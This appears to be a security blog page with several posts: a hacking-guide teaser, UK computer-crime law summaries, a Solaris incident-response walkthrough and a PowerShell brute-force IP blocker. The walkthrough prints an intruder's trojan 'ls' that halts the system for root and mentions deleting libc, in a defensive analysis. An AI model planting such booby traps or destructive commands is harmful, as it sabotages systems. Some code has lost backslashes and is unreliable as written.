Hacking Servers: A beginner’s guide

This information is to be used for informational purposes only.

I am asked at least 5 or more times a day by young, beginning “hackers”, “How can I hack?” or “Is there a way to hack a web site?” Well there is. There are, in fact, literally hundreds of ways to do this. I will discuss a few in this text to get you started. Every hacker has to start somehow and hacking web servers and ftp servers is one of the easiest ways.

If you are reading this I am assuming that you already have a basic knowledge of how web servers work and how to use some form of UNIX. But I am going to explain that stuff anyway for those of you who don’t know. Continue reading “Hacking Servers: A beginner’s guide”

Advertisements

The Fraud Act 2006

On 15 January 2007, the Fraud Act 2006 came into force and created three ways of committing a new offence of fraud:

  • Fraud by false representation
  • Fraud by failing to disclose information
  • Fraud by abuse of position

In each case, the defendant’s conduct must be dishonest with the intention of making a gain, or must cause a loss (or the risk of a loss) to another person or individual. Crucially, no actual gain or loss needs to be proved – the fraud might have been unsuccessful or it was stopped before it could take place. These offences are ‘triable either way’ and can be tried in the Magistrates’ Court or the Crown Court, with a maximum sentence of ten years imprisonment.

The fraud offences have a wide scope in that that they can be committed by a person outside of England and Wales. If you are accused of committing a fraud offence under the Fraud Act outside of this country, it is crucial that you take specialist advice, including advice on the issue of jurisdiction. Continue reading “The Fraud Act 2006”

The Computer Misuse Act of 1990

The Computer Misuse Act was enacted in the wake of the high profile hack in 1988 of a mailbox belonging to The Duke of Edinburgh by Robert Schifreen and Stephen Gold.

Prestel screenshot
Prestel screenshot

Prestel was a text-based interactive information system developed by the UK Post Office in the late 1970s. Users could browse numbered pages of text (similar to the contemporaneous Ceefax and Teletext information services) on their television as well as send electronic messages to other Prestel users. Prestel services were expensive and the system did not become widely used, although Prestel technology was sold to many other telecom companies. Prestel was gradually sold off in the early 1990s as the internet became available to domestic users. Continue reading “The Computer Misuse Act of 1990”

Beware of the Cyber Squatters

Your domain name could be stolen or given up to the evil entity known as the Cyber squatters whose main mission is to steal your web identity and this is how they do it. They could register YourDomainName.org, and do the same thing with YourDomainName.biz, therefore contacting you and try to sell you those names at advanced prices. If that doesn’t work, then the following events could happen.

They will allow your competitor to get a domain that sounds like yours, and allow him to cause confusion or try to steal your hard-earned traffic, business and clients. Continue reading “Beware of the Cyber Squatters”

Hacked: Now What?

HackedYou have that funny feeling that something is not right. One of your admins reported that his Unix box keeps rebooting in OpenWindows. You sit down at the box, type some commands, and wham, it reboots again. This doesn’t look like a bug, you’ve been hacked! Now what do you do?

How to Prepare.

Protecting your systems is only a part of information security. Preparing for the inevitable is another. Sooner or later, one of your systems will be compromised. What then? Backups are one critical part of recovery (nothing beats a total restore), however this should be considered as a last resort.

Here we will be discussing the knowledge and tools necessary to identify a compromised system, ascertain the hack, and recover the system, without a full restore. The first part of this article will cover tools and preparations you should make now. The second part will be a step by step example using these preparations. Although this article is by no means exhaustive, I hope to give you some basic ideas of where to start. For more information, a great place to start is http://www.cert.org/nav/recovering.html.

Logging

Logging is one of your most powerful tools in recovering from a security incident, logs are your friends. With extensive logging, you can potentially track the intruder’s actions, identify what has been compromised, and fix the system. Your goal is to cover various sources of logging, so you are not dependent on a single source of information.

The first place to start is /etc/syslog.conf. This file is the central command of logging, you control various logging functions here. At boot up, /usr/bin/syslogd reads this config. By editing this file, we can configure how the system logs.

The first thing we want to log is all inetd connections, such at telnet, ftp, rlogin, etc. to the file /var/adm/inetdlog. This way, whenever someone connects to the system, you have a log of what IP connected when.  First, create the file /var/adm/inetdlog  using the touch command. Second, add the following line to /etc/syslog.conf (make sure you use tabs, not spaces with the space bar):

daemon.notice           /var/adm/inetdlog

Now, restart the /usr/sbin/syslogd with kill HUP, this ensures logging to intedlog.  We are not done yet.  To enable this, inetd has to be running with both –s and –t parameter. In the last line of /etc/rc2.d/S72inetsvc, edit as follows:

/usr/bin/inetd –s -t

Now all inetd connections will be logged. For the -t parameter to take effect, you can either reboot the system, or  kill /usr/sbin/inetd, then manually launch /usr/sbin/inetd with the -s and -t parameter.   The only problem now is we are depending on a single source of information. If your system were compromised, the intruder could easily modify the logging on that system. To protect against this, we have all logging sent to an additional logging host, so we have two sources of logging. For this, we add an additional line to /etc/syslog.conf:

daemon.notice           @logger

For the truly paranoid, we can add one more layer of protection, have all logging output sent to printer. This way, the only way someone could compromise the logging is having physical access to the printer. For this, we add one last additional line to /etc/syslog.conf:

daemon.notice           /dev/printer

There are two other logs we want to ensure are functioning, /var/adm/sulog and /var/adm/loginlog. Sometimes, these logs are not enabled by default. Sulog logs all su attempts, regardless if they are successful or not. Loginlog logs all login attempts that fail 5 consecutive times. Both logs can be enabled by touching the following two files:

/var/adm/sulog
/var/adm/loginlog

The last step for logging is permissions. Solaris (even 2.6) has the nasty habit of setting bad permissions in /var/adm. Bad in that most logs can be read by everyone, and some can even be written by everyone. Keep in mind that /var/adm/loginglog and /var/adm/log/asppp.log keep passwords in plaintext. The best thing to do is chmod 750 * in /var/adm

Executables

This will be our second tool for dealing with a compromised system. When you access a compromised system, you can’t rely on the environment, or the files. The intruder most likely altered both. To protect yourself, create a floppy (or CDROM) that contains critical executables. These are the executables you will be using the future. The first thing you do on a compromised system is set your $PATH to the floppy, that way you are absolutely sure you are executing uncorrupted files. Examples of critical executables would include:

/usr/bin/ls           /usr/bin/grep
/usr/bin/find         /usr/bin/more
/usr/bin/truss        /usr/bin/vi

Also, keep a printout of all files suid 4000 and all hidden files (.*) on the floppy. This way you can determine if any new hidden or suid files have been added to the compromised system.

Now What?

Now, back to that system that kept rebooting in OpenWindows. If you remember, one of your admins reported his/her system is rebooting randomly in OpenWindows, specifically if you are root. You decide to verify for yourself. You reboot, go into OpenWindows, and do nothing: nothing happens after 10 minutes of staring at the screen. You decide to look around. After typing some basic commands, wham, the system reboots. Yep, this does not look like a bug, you have been hacked AND booby trapped. NOW WHAT? Here is an example of one possible option for troubleshooting the system.

Being the ever diligent admin, you already read an article similar to this, so you have both logs and floppy ready. So, where do we start? Logs are a great place to start, but first, never trust the environment, assume that the intruder has changed it (he/she probably already has).

You reboot the system, but escape out of openwindows starting up. You mount your handy floppy, set the path so it points ONLY to it, and then confirm your environment with the #env command. This way you know that you are executing trusted files. We are now ready to start investigating the system.

You decide to start with basic checks of critical files. You begin with the command

find / -user root -perm -4000 –print

You compare all the suid files to the ones on your floppy. Everything checks out, there are no new suid files. Now lets see if any new hidden files have been added. You then try:

find / -name “.. ” -print &
find / -name “.*” –print

No, everything checks out, there have been no new hidden or suid root files added. You decide to move on to the log files, specifically /var/adm/messages, again, nothing suspicious. So far everything checks out. You decide to get daring and try out the binaries on the system, again nothing. The system seems to be working just fine, as long as you are not in openwindows.

You decide to recreate the problem, you launch OpenWindows. From OpenWindows, you start poking around without using your floppy, then wham, it reboots! Aha, progress, the system reboots, but only when you use the system binaries while in OpenWindows. As the system reboots again you once again cancel out of OpenWindows. You reset your environment back to the floppy. You decide to try OpenWindows again, except this time we will use our buddy truss (we can trust truss since we are using our floppy).

#truss –f –t exec –o /var/adm/truss /usr/openwin/bin/openwin

You go into OpenWindows, and start poking around in the OpenWindows env. Wham, sure enough, the systems reboots, but you have the culprit with truss! After the reboot, using your floppy, you cat your truss file located at /var/adm/truss. Aha, you find the culprit in the end of the truss file, the system is executing halt.

So, you have found the hack, you are executing halt in OpenWindows. The system has been booby trapped, but how? For one last time, you launch openwin, from there you take a look at the environment. You notice that your path has changed, /usr/openwin/bin has been added to the beginning of the path. Any commands you execute will start there. Now you remember, openwin adds itself to the beginning of your path by default!

Using our trusted binaries by setting $PATH to our floppy, we cruise over to /usr/openwin/bin. You do a grep for “halt”, sure enough, you found the hack. The intruder has left a booby trap. He/she created a new file, /usr/openwin/bin/ls (see Listing A)

Now, lets find out who did it, this is where our logging comes in! The first log we want to look at is /var/adm/inetdlog. Here we find, by IP address, all the users that have connected to the server. We are looking for any IP addresses that should not be there, potentially with the same time/date stamp of /usr/openwin/bin/ls. Sure enough, you find an IP that looks suspicious, hacker.com. Now, lets find out what that users login was. With the suspicious IP addresses, you can map the intruder’s login to the IP with the “last” command, and then pipe it into grep for the IP address.

Sure enough, you got him, but what concerns you is its the login of one of your admins. You take a look at /var/adm/loginlog, but there are no failed attempts. It looks like the intruder knew the password for the login ahead of time. You take a look at /var/adm/sulog, once again, there are no failed attempts, this user didn’t have to guess any passwords. It looks like on of your admins has been careless with his/her passwords. How you handle this problem is for another article.

There are a variety of other tools and techniques to use, such as checksums, Tripwire, etc. The ideas mentioned here are just the first step in that preparation. To learn more, check outhttp://www.cert.org/nav/recovering.html

#cat /usr/openwin/bin/ls
#!/bin/ksh
if [“$LOGNAME” = “root”]
then
/usr/bin/ls

(sleep 5; /sbin/halt) & > /dev/null 2>&1else
/usr/bin/ls
A basic script that ruins your day. Imagine if rm /usr/lib/libc* was in there!

 

Are you being under attack? Here's a script that will block those attackers out

If you have had a public-facing server in your company, you will know that there are a lot of people without scruples that will try to hack into your server and steal your data (or simply do it for fun). I have had two servers now with different providers and the same thing happened over and over again. Unless the server was locked down to one single access IP, I would have thousands and thousands of hacking attempts per hour, every day, every week. After going through the event logs trying to figure out if any of them were successful, I found the need to automate IP blocking.

I had a list of 200+ IP I would block (mostly from China), and no sooner I would finish the block, another attempt would start. It would last between 1 min and 2h under which the server would receive continuous login attempts with usernames and passwords. I had to change the administrator username as it would be locked out after a few attempts. I could not face this on my own so I found this nice little power shell script to help.

15634_NpAdvHover

 

This is trying to find attacking IP address then add it into Firewall block rule.

Server Setup:

  1. You are running a Windows Server 2008 facing the Internet.
  2. You need to have some port open for service, e.g. TCP 21 for FTP; TCP 3389 for Remote Desktop. You can see in my code I’m only dealing with these two since that’s what I opened. You can add further port number if you like, but the way to process might be different with these two.
  3. I strongly suggest you use STRONG password and follow all security best practices, this ps1 code is NOT for adding security to your server, but reduce the nuisance from brute force attack, and make sys admin’s life easier: i.e. your FTP log won’t hold megabytes of nonsense, your Windows system log will not roll back and only can tell you what happened last month.
  4. You are comfortable with setting up Windows Firewall rules, in my code, my rule has a name of “MY BLACKLIST”, you need to setup a similar one, and set it to BLOCK everything.
  5. My rule is dangerous because it has the risk to block myself out as well. I do have a backup plan i.e. the DELL DRAC5 so that if that happens, I still can remote console to my server and reset the firewall.
  6. By no means the code is perfect, the coding style, the use of PowerShell skills, the hard coded part, all can be improved, it’s just that it’s good enough for me already. It has been running on my server for more than 7 MONTHS.
  7. Current code still has problem, I didn’t solve it yet, further on this point after the code. 🙂

#Dong Xie, March 2012

http://sqlblogcasts.com/blogs/dong/archive/2012/03/06/auto-blocking-attacking-ip-address.aspx

#my simple code to monitor attack and deal with it
#Windows Server 2008 Logon Type
#8: NetworkCleartext, i.e. FTP
#10: RemoteInteractive, i.e. RDP

$tick = 0;
“Start to run at: ” + (get-date);

$regex1 = [regex] “192.168.100.(?:101|102):3389s+(d+.d+.d+.d+)”;
$regex2 = [regex] “Source Network Address:t(d+.d+.d+.d+)”;

while($True) {
$blacklist = @();

“Running… (tick:” + $tick + “)”; $tick+=1;

#Port 3389
$a = @()
netstat -no | Select-String “:3389” | ? { $m = $regex1.Match($_); `
$ip = $m.Groups[1].Value; if ($m.Success -and $ip -ne “10.0.0.1”) {$a = $a + $ip;} }

if ($a.count -gt 0) {
$ips = get-eventlog Security -Newest 1000 | Where-Object {$_.EventID -eq 4625 -and $_.Message -match “Logon Type:s+10”} | foreach { `
$m = $regex2.Match($_.Message); $ip = $m.Groups[1].Value; $ip; } | Sort-Object | Tee-Object -Variable list | Get-Unique

foreach ($ip in $a) { if ($ips -contains $ip) {
if (-not ($blacklist -contains $ip)) {
$attack_count = ($list | Select-String $ip -SimpleMatch | Measure-Object).count;
“Found attacking IP on 3389: ” + $ip + “, with count: ” + $attack_count;
if ($attack_count -ge 20) {$blacklist = $blacklist + $ip;}
}
}
}
}

#FTP
$now = (Get-Date).AddMinutes(-5); #check only last 5 mins.
#Get-EventLog has built-in switch for EventID, Message, Time, etc. but using any of these it will be VERY slow.
$count = (Get-EventLog Security -Newest 1000 | Where-Object {$_.EventID -eq 4625 -and $_.Message -match “Logon Type:s+8” -and `
$_.TimeGenerated.CompareTo($now) -gt 0} | Measure-Object).count;
if ($count -gt 50) #threshold
{
$ips = @();
$ips1 = dir “C:inetpublogsLogFilesFPTSVC2” | Sort-Object -Property LastWriteTime -Descending `
| select -First 1 | gc | select -Last 200 | where {$_ -match “An+error+occured+during+the+authentication+process.”} `
| Select-String -Pattern “(d+.d+.d+.d+)” | select -ExpandProperty Matches | select -ExpandProperty value | Group-Object `
| where {$_.Count -ge 10} | select -ExpandProperty Name;

$ips2 = dir “C:inetpublogsLogFilesFTPSVC3” | Sort-Object -Property LastWriteTime -Descending `
| select -First 1 | gc | select -Last 200 | where {$_ -match “An+error+occured+during+the+authentication+process.”} `
| Select-String -Pattern “(d+.d+.d+.d+)” | select -ExpandProperty Matches | select -ExpandProperty value | Group-Object `
| where {$_.Count -ge 10} | select -ExpandProperty Name;
$ips += $ips1; $ips += $ips2; $ips = $ips | where {$_ -ne “10.0.0.1”} | Sort-Object | Get-Unique;

foreach ($ip in $ips) {
if (-not ($blacklist -contains $ip)) {
“Found attacking IP on FTP: ” + $ip;
$blacklist = $blacklist + $ip;
}
}
}

#Firewall change

<# $current = (netsh advfirewall firewall show rule name=”MY BLACKLIST” | where {$_ -match “RemoteIP”}).replace(“RemoteIP:”, “”).replace(” “,””).replace(“/255.255.255.255″,””); #inside $current there is no r or n need remove. foreach ($ip in $blacklist) { if (-not ($current -match $ip) -and -not ($ip -like “10.0.0.*”)) {“Adding this IP into firewall blocklist: ” + $ip; $c= ‘netsh advfirewall firewall set rule name=”MY BLACKLIST” new RemoteIP=”{0},{1}”‘ -f $ip, $current; Invoke-Expression $c; } } #>

foreach ($ip in $blacklist) {

$fw=New-object –comObject HNetCfg.FwPolicy2; # http://blogs.technet.com/b/jamesone/archive/2009/02/18/how-to-manage-the-windows-firewall-settings-with-powershell.aspx
$myrule = $fw.Rules | where {$_.Name -eq “MY BLACKLIST”} | select -First 1; # Potential bug here?

if (-not ($myrule.RemoteAddresses -match $ip) -and -not ($ip -like “10.0.0.*”))
{“Adding this IP into firewall blocklist: ” + $ip;
$myrule.RemoteAddresses+=(“,”+$ip);
}
}

Wait-Event -Timeout 30 #pause 30 secs

} # end of top while loop.

 


Further points:

1, I suppose the server is listening on port 3389 on server IP: 192.168.100.101 and 192.168.100.102, you need to replace that with your real IP.

2, I suppose you are Remote Desktop to this server from a workstation with IP: 10.0.0.1. Please replace as well.

3, The threshold for 3389 attack is 20, you don’t want to block yourself just because you typed your password wrong 3 times, you can change this threshold by your own reasoning.

4, FTP is checking the log for attack only to the last 5 mins, you can change that as well.

5, I suppose the server is serving FTP on both IP address and their LOG path are C:inetpublogsLogFilesFPTSVC2 and C:inetpublogsLogFilesFPTSVC3. Change accordingly.

6, FTP checking code is only asking for the last 200 lines of log, and the threshold is 10, change as you wish.

7, the code runs in a loop, you can set the loop time at the last line.


To run this code, copy and paste to your editor, finish all the editing, get it to your server, and open an CMD window, then type powershell.exe –file your_powershell_file_name.ps1, it will start running, you can Ctrl-C to break it.

This is what you see when it’s running:

image

This is when it detected attack and adding the firewall rule:

image


Regarding the design of the code:

1, There are many ways you can detect the attack, but to add an IP into a block rule is no small thing, you need to think hard before doing it, reason for that may include: You don’t want block yourself; and not blocking your customer/user, i.e. the good guy.

2, Thus for each service/port, I double check. For 3389, first it needs to show in netstat.exe, then the Event log; for FTP, first check the Event log, then the FTP log files.

3, At three places I need to make sure I’m not adding myself into the block rule. –ne with single IP, –like with subnet.

Now the final bit:

1, The code will stop working after a while (depends on how busy you are attacked, could be weeks, months, or days?!) It will throw Red error message in CMD, don’t Panic, it does no harm, but it also no longer blocking new attack. THE REASON is not confirmed with MS people: the COM object to manage firewall, you can only give it a list of IP addresses to the length of around 32KB I think, once it reaches the limit, you get the error message.

2, This is in fact my second solution to use the COM object, the first solution is still in the comment block for your reference, which is using netsh, that fails because being run from CMD, you can only throw it a list of IP to 8KB.

3, I haven’t worked the workaround yet, some ideas include: wrap that RemoteAddresses setting line with error checking and once it reaches the limit, use the newly detected IP to be the list, not appending to it. This basically reset your block rule to ground zero and lose the previous bad IPs. This does no harm as it sounds, because given a certain period has passed, any these bad IPs still not repent and continue the attack to you, it only got 30 seconds or 20 guesses of your password before you block it again. And there is the benefit that the bad IP may turn back to the good hands again, and you are not blocking a potential customer or your CEO’s home pc because once upon a time, it’s a zombie. Thus the ZEN of blocking: never block any IP for too long.

4, But if you insist to block the ugly forever, my other ideas include: You call MS support, ask them how can we set an arbitrary length of IP addresses in a rule; at least from my experiences at the Forum, they don’t know and they don’t care, because they think the dynamic blocking should be done by some expensive hardware. Or, from programming perspective, you can create a new rule once the old is full, then you’ll have MY BLACKLIST1, MY  BLACKLIST2, MY BLACKLIST3, … etc. Once in a while you can compile them together and start a business to sell your blacklist on the market!

Enjoy the code!

p.s. (PowerShell is REALLY REALLY GREAT!)

Glossary Of Computer Security Terms

Access
A specific type of interaction between a subject and an object that results in the flow of information from one to the other. (Source:
GCST).
Access Control
The process of limiting access to the resources of a system only to authorized programs, processes, or other systems (in a network). Synonymous with controlled access and limited access. (Source: GCST)
Accreditation
A formal declaration by the designated approving authority (DAA) that the automated information system (AIS) is approved to operate in a particular security mode using a prescribed sete of safeguards. Accreditation is the official management authorization for operation of an AIS and is based on the certification process as well as other management considerations. The accreditation
statement affixes security responsibility with the DAA and shows that due care has been taken for security. (Source: GCST)
Assurance
A measure of confidence that the security features and architecture of an AIS accurately mediate and enforce the security policy. Compare with trusted computer system. (Source: GCST)
Audit Trail
A chronological record of system activities that is sufficient to enable the reconstruction, reviewing, and examination of the sequence of environments and activities surrounding or leading to an operation, a procedure, or an event in a transaction from its inception to final results. (Source: GCST)
Authenticate
1.To verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.
2.To verify the integrity of data that have been stored, transmitted, or otherwise exposed to possible unauthorized modification.
(Source: GCST)
Authorization
The granting of acccess rights to a user, program, or process. (Source: GCST)
Automated Information System
An assembly of computer hardware, software, and/or firmware configured to collect, create, communicate, compute, disseminate, process, store, and/or control data or information. (Source: GCST)
Availability
The state when data is in the place needed by [or accessible to] the user, at the time the user needs them, and in the form needed by the user. (Source: GCST)
Certification
The comprehensive evaluation of the technical and nontechnical security features of an AIS and other safeguards, made in support of the accreditation process, that establishes the extent to which a  particular design and implementation meet a specified set of security requirements. (Source: GCST)
Compartmented Mode of Operation
An AIS is operating in the compartmented mode when each user with direct or indirect individual access to the AIS, its peripherals, remote terminals, or remote hosts, has all of the following:
A valid personnel clearance for the most restricted information on the system.
Formal access approval for, and has signed nondisclosure agreements for, that information to which the user is to have access.
A valid need-to-know for that information to which the user is to have access.
(Source: GCST)
Covert Channel
A communications channel that allows two cooperating processes
to transfer information in a manner that violates the system’s security policy. Synonymous with confinement channel. (Source: GCST)
Covert Storage Channel
A covert channel that involves the direct or indirect writing of a storage location by one process and the direct or indirect reading of the storage location by another process. Covert storage channnels typically involve a finite resource (e.g., sectors on a disk) that is shared by two subjects at different security levels. (Source: GCST)
Covert Timing Channel
A covert channel in which one process signals information to another by modulating its own use of system resources (e.g., CPU time) in such a way that this manipulation affects the real response time observed by the second process. (Source: GCST)
Dedicated Mode of Operation
An AIS is operating in the dedicated mode when each user with
direct or indirect individual access to the AIS, its peripherals, remote terminals, or remote hosts, has all of the following:
A valid personnel clearance for all information on the system.
Formal access approval for, and has signed nondisclosure agreements for, all the information stored and/or processed (including all compartments, subcompartments, and/or special access programs).
A valid need-to-know for all information contained within the system.
(Source: GCST)
Denial of Service
Any action or series of actions that prevent any part of a system from functioning in accordance with its intended purpose. This includes any action that causes unauthorized destruction, modification, or delay of service. Synonymous with interdiction. (Source: GCST)
Designated Approving Authority (DAA)
The official who has the authority to decide on accepting the security safeguards prescribed for an AIS, or that official who may be responsible for issuing an accreditation statement that records the decision to accept those safeguards. (Source: GCST)
Discretionary Access Control (DAC)
A means of restricting access to objects based on the identity and need-to-know of the user, process, and/or groups to which they belong. The controls are discretionary in the sense that a subject with a certain access permission is capable of passing that permission (perhaps indirectly) on to any other subject. Compare mandatory access control. (Source: GCST)
Evaluation
An assessment of a product agains the Trusted Computer System Evaluation Criteria (The Orange Book).
Information Warfare
Information warfare is the activity by a hacker, terrorist, or other adversary to disrupt an information system. Traditional security addresses the protection of information. Information warfare is aimed at protecting the systems that collect, store, manipulate, and transport information so that they are not accessed by unauthorized persons and are available as needed. (Source: Defense Information Infrastructure Master Plan)
Mandatory Access Control (MAC)
A means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity. Compare discretionary access control. (Source: GCST)
Multilevel Mode of Operation
An AIS is operating in the multilevel mode when all of the following statements are satisfied concerning the users with direct or indirect access to the AIS, its peripherals, remote terminals, or remote hosts:
Some do not have a valid personnel clearance for all of the information processed in the system.
All have the proper clearance and have the appropriate formal access approval for that information to which they are to have access.
All have a valid need-to-know for that information to which they are to have access.
(Source: GCST)
Multilevel Security (MLS)
An MLS system is a system containing information with different security classifications that simultaneously permits access by users with different security clearances and needs to know. This system prevents users from obtaining access to information for which they lack authorization. (Source: DOD Directive 5200.28)
Risk
The probability that a particular threat will exploit a particular vulnerability of the system. (Source: GCST)
Risk Analysis
The process of identifying security risks, determining their magnitude, and identifying areas needing safeguards. Risk analysis is a part of risk management. Synonymous with risk assessment. (Source: GCST)
Risk Management
The total process of identifying, controlling, and eliminating or minimizing uncertain events that may affect system resources. It includes risk analysis, cost/benefit analysis, selection, implementation and test, security evaluation of safeguards, and overall security review. (Source: GCST)
Sensitive Compartmented Information
Information restricted to people who have been given formal access to the security program, called a compartment.
Security Policy
The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information. (Source: GCST)
System-High Mode of Operation
An AIS is operating in the system-high mode when each user with direct or indirect access to the AIS, its peripherals, remote terminals, or remote hosts, has all of the following:
A valid personnel clearance for all information on the system.
Formal access approval for, and has signed nondisclosure agreements for, all the information stored and/or processed (including all compartments, subcompartments, and/or special access programs).
A valid need-to-know for some of the information contained within the system.
(Source: GCST)
Trusted Computer System
A system that employs sufficient hardware and software assurance measures to allow its use for simultaneous processing of a range of sensitive or classified information. (Source: GCST)
————————————————————————

Note: “GCST” means the Glossary of Computer Security Terms, NCSC-TG-004, 21 Oct 88 (the “Olive” Book).